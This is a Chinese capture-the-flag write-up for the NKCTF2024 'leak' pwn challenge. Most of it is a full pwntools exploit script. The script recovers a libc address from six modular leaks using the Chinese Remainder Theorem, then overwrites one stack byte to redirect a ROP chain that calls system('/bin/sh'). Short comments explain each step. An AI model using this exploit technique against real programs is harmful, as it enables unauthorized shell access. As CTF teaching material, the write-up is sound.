[NKCTF2024]-PWN:leak解析(中国剩余定理泄露libc地址,汇编覆盖返回地址)

查看保护

查看ida

先放exp

完整exp:

复制代码
from pwn import*
from sympy.ntheory.modular import crt
context(log_level='debug',arch='amd64')

while True:
    p=process('./leak')
    ps=[101,103,107,109,113,127]
    p.sendafter(b'secret\n',bytes(ps))
    cs=[0]*6
    for i in range(6):
        cs[i]=u32(p.recv(1).ljust(4,b'\x00'))
    print(hex(cs[i]))
    onestack=u32(p.recv(1).ljust(4,b'\x00'))
    if onestack+0x58>0xff:
        p.close()
        continue
    print("onestack"+hex(onestack))
    res=crt(ps,cs)[0]
    n=1
    for i in range(0,6):
        n*=ps[i]
    c=0
    stdout=0
    while True:
        stdout=res+c*n
        if (stdout>>44)==0x07:
            if (stdout&0xfff)==0x780:
                break
        c+=1
        assert c<100
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    libcbase=stdout-libc.sym['_IO_2_1_stdout_']
    ret=libcbase+0x29139
    pop_rdi=libcbase+0x2a3e5
    system=libcbase+libc.sym['system']
    binsh=libcbase+next(libc.search(b'/bin/sh'))
    payload=p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p8((onestack+0x58)&0xff)
    p.send(payload)
    #p.send(b'aa')

    p.interactive()
    break

#解释点1:这里是接收程序输出的六次结果来解中国剩余定理来算出stdout的地址,算出libc基地址。

#解释点2:这里最后覆盖一个字节的栈地址是为了把payload全覆盖到返回地址上去。这个是从汇编指令上看的

这里把地址移动到rcx之后就以rcx内的值来确定移动位置,因为rbp+buf的位置存的是栈上地址,如果我们把最后一个字节覆盖掉就可以控制rcx的值,从而控制payload移动的位置,执行getshell。

相关推荐
mounter6251 小时前
从内存隔离到运行时防线:透视 Linux 内核安全强化的博弈与演进
linux·网络·安全·linux kernel·kernel
chenyulin45453 小时前
企业微信API二次开发:万级并发回调下的极致幂等性设计与防重放架构实战
大数据·人工智能·安全·架构·企业微信
Dlrb12114 小时前
ARM指令集---汇编指令集的学习与应用:C程序与汇编的相互调用,处理器工作模式的改变等
汇编·arm开发·arm··arm指令集·汇编指令
CypressTel5 小时前
JADEPUFFER暴露企业安全防御新挑战——赛柏特安全观察
安全
上海云盾-小余6 小时前
流量攻击详解:区分带宽耗尽与资源耗尽两类攻击
爬虫·安全·ddos
科力锐品牌君6 小时前
医院数据存储“乱象”:如何兼顾兼容、高效与合规?
大数据·安全·备份·存储·存储方案
Chockmans7 小时前
春秋云境CVE-2023-51385(保姆级教学)
大数据·web安全·elasticsearch·搜索引擎·网络安全·春秋云境·cve-2023-51385
长风2308 小时前
Day 17: 突破 AOB 框架霸权 —— 插件界面重构与大屏呈现
人工智能·安全
清欢渡---8 小时前
HCIP-第五章vrrp
网络·网络安全·hcip
chenyulin45458 小时前
企业微信API:海量会话存档数据的高性能检索与Elasticsearch索引设计
大数据·人工智能·安全·企业微信